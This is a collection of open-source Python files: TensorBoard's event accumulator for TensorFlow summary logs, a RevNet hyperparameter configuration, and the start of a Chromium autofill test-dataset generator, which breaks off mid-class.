# ==============================================================================
# File: tensorflow/tensorboard/backend/event_processing/event_accumulator.py
# Repo: sugartom/tensorflow-alien (license: Apache-2.0)
# ==============================================================================
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Takes a generator of values, and accumulates them for a frontend."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import re
import threading
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf.config_pb2 import RunMetadata
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.tensorboard.backend.event_processing import directory_watcher
from tensorflow.tensorboard.backend.event_processing import event_file_loader
from tensorflow.tensorboard.backend.event_processing import reservoir
namedtuple = collections.namedtuple
ScalarEvent = namedtuple('ScalarEvent', ['wall_time', 'step', 'value'])
HealthPillEvent = namedtuple(
'HealthPillEvent',
['wall_time', 'step', 'node_name', 'output_slot', 'value'])
CompressedHistogramEvent = namedtuple('CompressedHistogramEvent',
['wall_time', 'step',
'compressed_histogram_values'])
CompressedHistogramValue = namedtuple('CompressedHistogramValue',
['basis_point', 'value'])
HistogramEvent = namedtuple('HistogramEvent',
['wall_time', 'step', 'histogram_value'])
HistogramValue = namedtuple('HistogramValue', ['min', 'max', 'num', 'sum',
'sum_squares', 'bucket_limit',
'bucket'])
ImageEvent = namedtuple('ImageEvent', ['wall_time', 'step',
'encoded_image_string', 'width',
'height'])
AudioEvent = namedtuple('AudioEvent', ['wall_time', 'step',
'encoded_audio_string', 'content_type',
'sample_rate', 'length_frames'])
TensorEvent = namedtuple('TensorEvent', ['wall_time', 'step', 'tensor_proto'])
## Different types of summary events handled by the event_accumulator
SUMMARY_TYPES = {
'simple_value': '_ProcessScalar',
'histo': '_ProcessHistogram',
'image': '_ProcessImage',
'audio': '_ProcessAudio',
'tensor': '_ProcessTensor',
}
## The tagTypes below are just arbitrary strings chosen to pass the type
## information of the tag from the backend to the frontend
COMPRESSED_HISTOGRAMS = 'compressedHistograms'
HISTOGRAMS = 'histograms'
IMAGES = 'images'
AUDIO = 'audio'
SCALARS = 'scalars'
TENSORS = 'tensors'
HEALTH_PILLS = 'health_pills'
GRAPH = 'graph'
META_GRAPH = 'meta_graph'
RUN_METADATA = 'run_metadata'
## Normal CDF for std_devs: (-Inf, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, Inf)
## naturally gives bands around median of width 1 std dev, 2 std dev, 3 std dev,
## and then the long tail.
NORMAL_HISTOGRAM_BPS = (0, 668, 1587, 3085, 5000, 6915, 8413, 9332, 10000)
DEFAULT_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 500,
IMAGES: 4,
AUDIO: 4,
SCALARS: 10000,
# We store this many health pills per op.
HEALTH_PILLS: 100,
HISTOGRAMS: 1,
TENSORS: 10,
}
STORE_EVERYTHING_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 0,
IMAGES: 0,
AUDIO: 0,
SCALARS: 0,
HEALTH_PILLS: 0,
HISTOGRAMS: 0,
TENSORS: 0,
}
# The tag that values containing health pills have. Health pill data is stored
# in tensors. In order to distinguish health pill values from scalar values, we
# rely on the fact that health pill values carry this special tag value.
HEALTH_PILL_EVENT_TAG = '__health_pill__'
def IsTensorFlowEventsFile(path):
"""Check the path name to see if it is probably a TF Events file.
Args:
path: A file path to check if it is an event file.
Raises:
ValueError: If the path is an empty string.
  Returns:
    True if `path` is formatted like a TensorFlow events file.
"""
if not path:
raise ValueError('Path must be a nonempty string')
return 'tfevents' in compat.as_str_any(os.path.basename(path))
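# Illustration of the heuristic above (hypothetical paths, not part of the
# original module; the check only looks for 'tfevents' in the basename):
#
#   IsTensorFlowEventsFile('/logs/events.out.tfevents.1490000000.host')  # True
#   IsTensorFlowEventsFile('/logs/checkpoint')                           # False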
class EventAccumulator(object):
"""An `EventAccumulator` takes an event generator, and accumulates the values.
The `EventAccumulator` is intended to provide a convenient Python interface
for loading Event data written during a TensorFlow run. TensorFlow writes out
`Event` protobuf objects, which have a timestamp and step number, and often
contain a `Summary`. Summaries can have different kinds of data like an image,
a scalar value, or a histogram. The Summaries also have a tag, which we use to
organize logically related data. The `EventAccumulator` supports retrieving
the `Event` and `Summary` data by its tag.
Calling `Tags()` gets a map from `tagType` (e.g. `'images'`,
`'compressedHistograms'`, `'scalars'`, etc) to the associated tags for those
  data types. Then, various functional endpoints (e.g.
`Accumulator.Scalars(tag)`) allow for the retrieval of all data
associated with that tag.
The `Reload()` method synchronously loads all of the data written so far.
Histograms, audio, and images are very large, so storing all of them is not
recommended.
@@Tensors
"""
def __init__(self,
path,
size_guidance=DEFAULT_SIZE_GUIDANCE,
compression_bps=NORMAL_HISTOGRAM_BPS,
purge_orphaned_data=True):
"""Construct the `EventAccumulator`.
Args:
path: A file path to a directory containing tf events files, or a single
tf events file. The accumulator will load events from this path.
size_guidance: Information on how much data the EventAccumulator should
store in memory. The DEFAULT_SIZE_GUIDANCE tries not to store too much
so as to avoid OOMing the client. The size_guidance should be a map
from a `tagType` string to an integer representing the number of
items to keep per tag for items of that `tagType`. If the size is 0,
all events are stored.
compression_bps: Information on how the `EventAccumulator` should compress
histogram data for the `CompressedHistograms` tag (for details see
`ProcessCompressedHistogram`).
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
sizes = {}
for key in DEFAULT_SIZE_GUIDANCE:
if key in size_guidance:
sizes[key] = size_guidance[key]
else:
sizes[key] = DEFAULT_SIZE_GUIDANCE[key]
self._first_event_timestamp = None
self._scalars = reservoir.Reservoir(size=sizes[SCALARS])
    # Unlike the other reservoirs, the reservoir for health pills is keyed by the
# name of the op instead of the tag. This lets us efficiently obtain the
# health pills per node.
self._health_pills = reservoir.Reservoir(size=sizes[HEALTH_PILLS])
self._graph = None
self._graph_from_metagraph = False
self._meta_graph = None
self._tagged_metadata = {}
self._histograms = reservoir.Reservoir(size=sizes[HISTOGRAMS])
self._compressed_histograms = reservoir.Reservoir(
size=sizes[COMPRESSED_HISTOGRAMS], always_keep_last=False)
self._images = reservoir.Reservoir(size=sizes[IMAGES])
self._audio = reservoir.Reservoir(size=sizes[AUDIO])
self._tensors = reservoir.Reservoir(size=sizes[TENSORS])
self._generator_mutex = threading.Lock()
self._generator = _GeneratorFromPath(path)
self._compression_bps = compression_bps
self.purge_orphaned_data = purge_orphaned_data
self.most_recent_step = -1
self.most_recent_wall_time = -1
self.file_version = None
# The attributes that get built up by the accumulator
self.accumulated_attrs = ('_scalars', '_histograms',
'_compressed_histograms', '_images', '_audio')
self._tensor_summaries = {}
def Reload(self):
"""Loads all events added since the last call to `Reload`.
If `Reload` was never called, loads all events in the file.
Returns:
The `EventAccumulator`.
"""
with self._generator_mutex:
for event in self._generator.Load():
self._ProcessEvent(event)
return self
def FirstEventTimestamp(self):
"""Returns the timestamp in seconds of the first event.
    If the first event has been loaded (either by this method or by `Reload`),
    this returns immediately. Otherwise, it will load in the first event. Note
that this means that calling `Reload` will cause this to block until
`Reload` has finished.
Returns:
The timestamp in seconds of the first event that was loaded.
Raises:
ValueError: If no events have been loaded and there were no events found
on disk.
"""
if self._first_event_timestamp is not None:
return self._first_event_timestamp
with self._generator_mutex:
try:
event = next(self._generator.Load())
self._ProcessEvent(event)
return self._first_event_timestamp
except StopIteration:
raise ValueError('No event timestamp could be found')
def _ProcessEvent(self, event):
"""Called whenever an event is loaded."""
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField('file_version'):
new_file_version = _ParseFileVersion(event.file_version)
if self.file_version and self.file_version != new_file_version:
## This should not happen.
logging.warn(('Found new file_version for event.proto. This will '
'affect purging logic for TensorFlow restarts. '
'Old: {0} New: {1}').format(self.file_version,
new_file_version))
self.file_version = new_file_version
self._MaybePurgeOrphanedData(event)
## Process the event.
# GraphDef and MetaGraphDef are handled in a special way:
# If no graph_def Event is available, but a meta_graph_def is, and it
# contains a graph_def, then use the meta_graph_def.graph_def as our graph.
# If a graph_def Event is available, always prefer it to the graph_def
# inside the meta_graph_def.
if event.HasField('graph_def'):
if self._graph is not None:
logging.warn(('Found more than one graph event per run, or there was '
'a metagraph containing a graph_def, as well as one or '
'more graph events. Overwriting the graph with the '
'newest event.'))
self._graph = event.graph_def
self._graph_from_metagraph = False
elif event.HasField('meta_graph_def'):
if self._meta_graph is not None:
logging.warn(('Found more than one metagraph event per run. '
'Overwriting the metagraph with the newest event.'))
self._meta_graph = event.meta_graph_def
if self._graph is None or self._graph_from_metagraph:
# We may have a graph_def in the metagraph. If so, and no
# graph_def is directly available, use this one instead.
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
if meta_graph.graph_def:
if self._graph is not None:
            logging.warn(('Found multiple metagraphs containing graph_defs, '
'but did not find any graph events. Overwriting the '
'graph with the newest metagraph version.'))
self._graph_from_metagraph = True
self._graph = meta_graph.graph_def.SerializeToString()
elif event.HasField('tagged_run_metadata'):
tag = event.tagged_run_metadata.tag
if tag in self._tagged_metadata:
logging.warn('Found more than one "run metadata" event with tag ' +
tag + '. Overwriting it with the newest event.')
self._tagged_metadata[tag] = event.tagged_run_metadata.run_metadata
elif event.HasField('summary'):
for value in event.summary.value:
if value.HasField('tensor') and value.tag == HEALTH_PILL_EVENT_TAG:
self._ProcessHealthPillSummary(value, event)
else:
for summary_type, summary_func in SUMMARY_TYPES.items():
if value.HasField(summary_type):
datum = getattr(value, summary_type)
tag = value.node_name if summary_type == 'tensor' else value.tag
getattr(self, summary_func)(tag, event.wall_time, event.step,
datum)
def _ProcessHealthPillSummary(self, value, event):
"""Process summaries containing health pills.
These summaries are distinguished by the fact that they have a Tensor field
and have a special tag value.
This method emits ERROR-level messages to the logs if it encounters Tensor
summaries that it cannot process.
Args:
value: A summary_pb2.Summary.Value with a Tensor field.
event: The event_pb2.Event containing that value.
"""
elements = tensor_util.MakeNdarray(value.tensor)
# The node_name property of the value object is actually a watch key: a
# combination of node name, output slot, and a suffix. We capture the
# actual node name and the output slot with a regular expression.
match = re.match(r'^(.*):(\d+):DebugNumericSummary$', value.node_name)
if not match:
logging.log_first_n(
logging.ERROR,
'Unsupported watch key %s for health pills; skipping this sequence.',
1,
value.node_name)
return
node_name = match.group(1)
output_slot = int(match.group(2))
self._ProcessHealthPill(
event.wall_time, event.step, node_name, output_slot, elements)
def Tags(self):
"""Return all tags found in the value stream.
Returns:
A `{tagType: ['list', 'of', 'tags']}` dictionary.
"""
return {
IMAGES: self._images.Keys(),
AUDIO: self._audio.Keys(),
HISTOGRAMS: self._histograms.Keys(),
SCALARS: self._scalars.Keys(),
COMPRESSED_HISTOGRAMS: self._compressed_histograms.Keys(),
TENSORS: self._tensors.Keys(),
# Use a heuristic: if the metagraph is available, but
# graph is not, then we assume the metagraph contains the graph.
GRAPH: self._graph is not None,
META_GRAPH: self._meta_graph is not None,
RUN_METADATA: list(self._tagged_metadata.keys())
}
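  # Shape of the returned mapping, sketched with hypothetical tag names (the
  # graph/meta_graph entries are booleans indicating presence, not tag lists):
  #
  #   {'images': ['input'], 'audio': [], 'histograms': ['weights'],
  #    'scalars': ['loss', 'accuracy'], 'compressedHistograms': ['weights'],
  #    'tensors': [], 'graph': True, 'meta_graph': False, 'run_metadata': []}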
def Scalars(self, tag):
"""Given a summary tag, return all associated `ScalarEvent`s.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ScalarEvent`s.
"""
return self._scalars.Items(tag)
def HealthPills(self, node_name):
"""Returns all health pill values for a certain node.
Args:
node_name: The name of the node to obtain health pills for.
Raises:
KeyError: If the node name is not found.
Returns:
An array of `HealthPillEvent`s.
"""
return self._health_pills.Items(node_name)
def Graph(self):
"""Return the graph definition, if there is one.
If the graph is stored directly, return that. If no graph is stored
directly but a metagraph is stored containing a graph, return that.
Raises:
ValueError: If there is no graph for this run.
Returns:
The `graph_def` proto.
"""
graph = graph_pb2.GraphDef()
if self._graph is not None:
graph.ParseFromString(self._graph)
return graph
raise ValueError('There is no graph in this EventAccumulator')
def MetaGraph(self):
"""Return the metagraph definition, if there is one.
Raises:
ValueError: If there is no metagraph for this run.
Returns:
The `meta_graph_def` proto.
"""
if self._meta_graph is None:
raise ValueError('There is no metagraph in this EventAccumulator')
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
return meta_graph
def RunMetadata(self, tag):
"""Given a tag, return the associated session.run() metadata.
Args:
tag: A string tag associated with the event.
Raises:
ValueError: If the tag is not found.
Returns:
The metadata in form of `RunMetadata` proto.
"""
if tag not in self._tagged_metadata:
raise ValueError('There is no run metadata with this tag name')
run_metadata = RunMetadata()
run_metadata.ParseFromString(self._tagged_metadata[tag])
return run_metadata
def Histograms(self, tag):
"""Given a summary tag, return all associated histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `HistogramEvent`s.
"""
return self._histograms.Items(tag)
def CompressedHistograms(self, tag):
"""Given a summary tag, return all associated compressed histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `CompressedHistogramEvent`s.
"""
return self._compressed_histograms.Items(tag)
def Images(self, tag):
"""Given a summary tag, return all associated images.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ImageEvent`s.
"""
return self._images.Items(tag)
def Audio(self, tag):
"""Given a summary tag, return all associated audio.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `AudioEvent`s.
"""
return self._audio.Items(tag)
def Tensors(self, tag):
"""Given a summary tag, return all associated tensors.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `TensorEvent`s.
"""
return self._tensors.Items(tag)
def _MaybePurgeOrphanedData(self, event):
"""Maybe purge orphaned data due to a TensorFlow crash.
When TensorFlow crashes at step T+O and restarts at step T, any events
written after step T are now "orphaned" and will be at best misleading if
they are included in TensorBoard.
This logic attempts to determine if there is orphaned data, and purge it
if it is found.
Args:
event: The event to use as a reference, to determine if a purge is needed.
"""
if not self.purge_orphaned_data:
return
## Check if the event happened after a crash, and purge expired tags.
if self.file_version and self.file_version >= 2:
## If the file_version is recent enough, use the SessionLog enum
## to check for restarts.
self._CheckForRestartAndMaybePurge(event)
else:
## If there is no file version, default to old logic of checking for
## out of order steps.
self._CheckForOutOfOrderStepAndMaybePurge(event)
def _CheckForRestartAndMaybePurge(self, event):
"""Check and discard expired events using SessionLog.START.
Check for a SessionLog.START event and purge all previously seen events
with larger steps, because they are out of date. Because of supervisor
threading, it is possible that this logic will cause the first few event
messages to be discarded since supervisor threading does not guarantee
that the START message is deterministically written first.
This method is preferred over _CheckForOutOfOrderStepAndMaybePurge which
can inadvertently discard events due to supervisor threading.
Args:
event: The event to use as reference. If the event is a START event, all
previously seen events with a greater event.step will be purged.
"""
if event.HasField(
'session_log') and event.session_log.status == SessionLog.START:
self._Purge(event, by_tags=False)
def _CheckForOutOfOrderStepAndMaybePurge(self, event):
"""Check for out-of-order event.step and discard expired events for tags.
Check if the event is out of order relative to the global most recent step.
If it is, purge outdated summaries for tags that the event contains.
Args:
event: The event to use as reference. If the event is out-of-order, all
events with the same tags, but with a greater event.step will be purged.
"""
if event.step < self.most_recent_step and event.HasField('summary'):
self._Purge(event, by_tags=True)
else:
self.most_recent_step = event.step
self.most_recent_wall_time = event.wall_time
def _ConvertHistogramProtoToTuple(self, histo):
return HistogramValue(min=histo.min,
max=histo.max,
num=histo.num,
sum=histo.sum,
sum_squares=histo.sum_squares,
bucket_limit=list(histo.bucket_limit),
bucket=list(histo.bucket))
def _ProcessHistogram(self, tag, wall_time, step, histo):
"""Processes a proto histogram by adding it to accumulated state."""
histo = self._ConvertHistogramProtoToTuple(histo)
histo_ev = HistogramEvent(wall_time, step, histo)
self._histograms.AddItem(tag, histo_ev)
self._compressed_histograms.AddItem(
tag, histo_ev, lambda x: _CompressHistogram(x, self._compression_bps))
def _ProcessImage(self, tag, wall_time, step, image):
"""Processes an image by adding it to accumulated state."""
event = ImageEvent(wall_time=wall_time,
step=step,
encoded_image_string=image.encoded_image_string,
width=image.width,
height=image.height)
self._images.AddItem(tag, event)
def _ProcessAudio(self, tag, wall_time, step, audio):
"""Processes a audio by adding it to accumulated state."""
event = AudioEvent(wall_time=wall_time,
step=step,
encoded_audio_string=audio.encoded_audio_string,
content_type=audio.content_type,
sample_rate=audio.sample_rate,
length_frames=audio.length_frames)
self._audio.AddItem(tag, event)
def _ProcessScalar(self, tag, wall_time, step, scalar):
"""Processes a simple value by adding it to accumulated state."""
sv = ScalarEvent(wall_time=wall_time, step=step, value=scalar)
self._scalars.AddItem(tag, sv)
def _ProcessTensor(self, tag, wall_time, step, tensor):
tv = TensorEvent(wall_time=wall_time, step=step, tensor_proto=tensor)
self._tensors.AddItem(tag, tv)
def _ProcessHealthPill(self, wall_time, step, node_name, output_slot,
elements):
"""Processes a health pill value by adding it to accumulated state.
Args:
wall_time: The time at which the health pill was created. Provided by the
debugger.
step: The step at which the health pill was created. Provided by the
debugger.
node_name: The name of the node for this health pill.
output_slot: The output slot for this health pill.
elements: An ND array of 12 floats. The elements of the health pill.
"""
# Key by the node name for fast retrieval of health pills by node name. The
# array is cast to a list so that it is JSON-able. The debugger data plugin
# serves a JSON response.
self._health_pills.AddItem(
node_name,
HealthPillEvent(
wall_time=wall_time,
step=step,
node_name=node_name,
output_slot=output_slot,
value=list(elements)))
def _Purge(self, event, by_tags):
"""Purge all events that have occurred after the given event.step.
If by_tags is True, purge all events that occurred after the given
event.step, but only for the tags that the event has. Non-sequential
event.steps suggest that a TensorFlow restart occurred, and we discard
the out-of-order events to display a consistent view in TensorBoard.
    Discarding by tags is the safer method when we are unsure whether a restart
    has occurred, given that threading in the supervisor can cause events of
    different tags to arrive with unsynchronized step values.
If by_tags is False, then purge all events with event.step greater than the
given event.step. This can be used when we are certain that a TensorFlow
restart has occurred and these events can be discarded.
Args:
event: The event to use as reference for the purge. All events with
the same tags, but with a greater event.step will be purged.
by_tags: Bool to dictate whether to discard all out-of-order events or
only those that are associated with the given reference event.
"""
    ## Keep data in reservoirs that have a step less than event.step
_NotExpired = lambda x: x.step < event.step
if by_tags:
def _ExpiredPerTag(value):
return [getattr(self, x).FilterItems(_NotExpired, value.tag)
for x in self.accumulated_attrs]
expired_per_tags = [_ExpiredPerTag(value)
for value in event.summary.value]
expired_per_type = [sum(x) for x in zip(*expired_per_tags)]
else:
expired_per_type = [getattr(self, x).FilterItems(_NotExpired)
for x in self.accumulated_attrs]
if sum(expired_per_type) > 0:
purge_msg = _GetPurgeMessage(self.most_recent_step,
self.most_recent_wall_time, event.step,
event.wall_time, *expired_per_type)
logging.warn(purge_msg)
def _GetPurgeMessage(most_recent_step, most_recent_wall_time, event_step,
event_wall_time, num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio):
"""Return the string message associated with TensorBoard purges."""
return ('Detected out of order event.step likely caused by '
          'a TensorFlow restart. Purging expired events from TensorBoard'
' display between the previous step: {} (timestamp: {}) and '
'current step: {} (timestamp: {}). Removing {} scalars, {} '
'histograms, {} compressed histograms, {} images, '
'and {} audio.').format(most_recent_step, most_recent_wall_time,
event_step, event_wall_time,
num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio)
def _GeneratorFromPath(path):
"""Create an event generator for file or directory at given path string."""
if not path:
raise ValueError('path must be a valid string')
if IsTensorFlowEventsFile(path):
return event_file_loader.EventFileLoader(path)
else:
return directory_watcher.DirectoryWatcher(
path, event_file_loader.EventFileLoader, IsTensorFlowEventsFile)
def _ParseFileVersion(file_version):
"""Convert the string file_version in event.proto into a float.
Args:
file_version: String file_version from event.proto
Returns:
Version number as a float.
"""
tokens = file_version.split('brain.Event:')
try:
return float(tokens[-1])
except ValueError:
## This should never happen according to the definition of file_version
## specified in event.proto.
logging.warn(('Invalid event.proto file_version. Defaulting to use of '
'out-of-order event.step logic for purging expired events.'))
return -1
def _CompressHistogram(histo_ev, bps):
"""Creates fixed size histogram by adding compression to accumulated state.
This routine transforms a histogram at a particular step by linearly
interpolating its variable number of buckets to represent their cumulative
weight at a constant number of compression points. This significantly reduces
the size of the histogram and makes it suitable for a two-dimensional area
plot where the output of this routine constitutes the ranges for a single x
coordinate.
Args:
histo_ev: A HistogramEvent namedtuple.
bps: Compression points represented in basis points, 1/100ths of a percent.
Returns:
CompressedHistogramEvent namedtuple.
"""
# See also: Histogram::Percentile() in core/lib/histogram/histogram.cc
histo = histo_ev.histogram_value
if not histo.num:
return CompressedHistogramEvent(
histo_ev.wall_time,
histo_ev.step,
[CompressedHistogramValue(b, 0.0) for b in bps])
bucket = np.array(histo.bucket)
weights = (bucket * bps[-1] / (bucket.sum() or 1.0)).cumsum()
values = []
j = 0
while j < len(bps):
i = np.searchsorted(weights, bps[j], side='right')
while i < len(weights):
cumsum = weights[i]
cumsum_prev = weights[i - 1] if i > 0 else 0.0
if cumsum == cumsum_prev: # prevent remap divide by zero
i += 1
continue
if not i or not cumsum_prev:
lhs = histo.min
else:
lhs = max(histo.bucket_limit[i - 1], histo.min)
rhs = min(histo.bucket_limit[i], histo.max)
weight = _Remap(bps[j], cumsum_prev, cumsum, lhs, rhs)
values.append(CompressedHistogramValue(bps[j], weight))
j += 1
break
else:
break
while j < len(bps):
values.append(CompressedHistogramValue(bps[j], histo.max))
j += 1
return CompressedHistogramEvent(histo_ev.wall_time, histo_ev.step, values)
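# Worked example for the linear remapping below (hypothetical numbers): with
# cumulative weights 2500 and 7500 bounding a compression point of 5000 basis
# points, the interpolation lands halfway between the bucket edges, e.g.
# _Remap(5000, 2500, 7500, 0.0, 1.0) == 0.5.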
def _Remap(x, x0, x1, y0, y1):
"""Linearly map from [x0, x1] unto [y0, y1]."""
return y0 + (x - x0) * float(y1 - y0) / (x1 - x0)
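# Usage sketch for this module (hypothetical log directory and tag name, not
# part of the original file; no data is visible until Reload() is called):
#
#   acc = EventAccumulator('/tmp/my_run',
#                          size_guidance=STORE_EVERYTHING_SIZE_GUIDANCE)
#   acc.Reload()
#   if 'loss' in acc.Tags()[SCALARS]:
#     for ev in acc.Scalars('loss'):
#       print('step %d: %f' % (ev.step, ev.value))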
# ==============================================================================
# File: tensorflow/contrib/eager/python/examples/revnet/config.py
# Repo: dongjoon-hyun/tensorflow (license: Apache-2.0)
# ==============================================================================
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Reversible residual network compatible with eager execution.
Configuration in format of tf.contrib.training.HParams.
Supports CIFAR-10, CIFAR-100, and ImageNet datasets.
Reference [The Reversible Residual Network: Backpropagation
Without Storing Activations](https://arxiv.org/pdf/1707.04585.pdf)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def get_hparams_cifar_38():
"""RevNet-38 configurations for CIFAR-10/CIFAR-100."""
config = tf.contrib.training.HParams()
config.add_hparam("num_train_images", 50000)
config.add_hparam("num_eval_images", 10000)
config.add_hparam("init_filters", 32)
config.add_hparam("init_kernel", 3)
config.add_hparam("init_stride", 1)
config.add_hparam("n_rev_blocks", 3)
config.add_hparam("n_res", [3, 3, 3])
config.add_hparam("filters", [32, 64, 112])
config.add_hparam("strides", [1, 2, 2])
config.add_hparam("batch_size", 100)
config.add_hparam("bottleneck", False)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", False)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 32, 32))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (32, 32, 3))
config.add_hparam("data_format", "channels_last")
# Training details
config.add_hparam("weight_decay", 2e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [40000, 60000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3])
config.add_hparam("max_train_iter", 80000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 1000)
config.add_hparam("div255", True)
  # This is imprecise: when training with a validation set, we only have
  # 40k images in the training data.
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
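# Usage sketch (assumes TF 1.x with tf.contrib available; the keys are the
# hparams registered above):
#
#   config = get_hparams_cifar_38()
#   print(config.batch_size)             # 100
#   print(config.filters, config.n_res)  # [32, 64, 112] [3, 3, 3]
#   config.add_hparam("note", "custom")  # extend with new keys as needed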
def get_hparams_cifar_110():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
return config
def get_hparams_cifar_164():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
  config.bottleneck = True
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
return config
def get_hparams_imagenet_56():
"""RevNet-56 configurations for ImageNet."""
config = tf.contrib.training.HParams()
config.add_hparam("n_classes", 1000)
config.add_hparam("dataset", "ImageNet")
config.add_hparam("num_train_images", 1281167)
config.add_hparam("num_eval_images", 50000)
config.add_hparam("init_filters", 128)
config.add_hparam("init_kernel", 7)
config.add_hparam("init_stride", 2)
config.add_hparam("n_rev_blocks", 4)
config.add_hparam("n_res", [2, 2, 2, 2])
config.add_hparam("filters", [128, 256, 512, 832])
config.add_hparam("strides", [1, 2, 2, 2])
config.add_hparam("batch_size", 256)
config.add_hparam("bottleneck", True)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", True)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 224, 224))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (224, 224, 3))
config.add_hparam("data_format", "channels_last")
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
# Training details
config.add_hparam("weight_decay", 1e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [160000, 320000, 480000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3, 1e-4])
config.add_hparam("max_train_iter", 600000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 256)
config.add_hparam("div255", True)
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_imagenet_104():
config = get_hparams_imagenet_56()
config.n_res = [2, 2, 11, 2]
return config
# ==============================================================================
# File: chrome/test/functional/autofill_dataset_generator.py
# Repo: Crystalnix/BitPop (license: BSD-3-Clause)
# ==============================================================================
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates profile dictionaries for Autofill.
Used to test autofill.AutofillTest.FormFillLatencyAfterSubmit.
Can be used as a stand alone script with -h to print out help text by running:
python autofill_dataset_generator.py -h
"""
import codecs
import logging
from optparse import OptionParser
import os
import random
import re
import sys
class NullHandler(logging.Handler):
def emit(self, record):
pass
class DatasetGenerator(object):
"""Generates a dataset of dictionaries.
The lists (such as address_construct, city_construct) define the way the
corresponding field is generated. They accomplish this by specifying a
list of function-args lists.
"""
address_construct = [
[ random.randint, 1, 10000],
[ None, u'foobar'],
[ random.choice, [ u'St', u'Ave', u'Ln', u'Ct', ]],
[ random.choice, [ u'#1', u'#2', u'#3', ]],
]
city_construct = [
[ random.choice, [ u'San Jose', u'San Francisco', u'Sacramento',
u'Los Angeles', ]],
]
state_construct = [
[ None, u'CA']
]
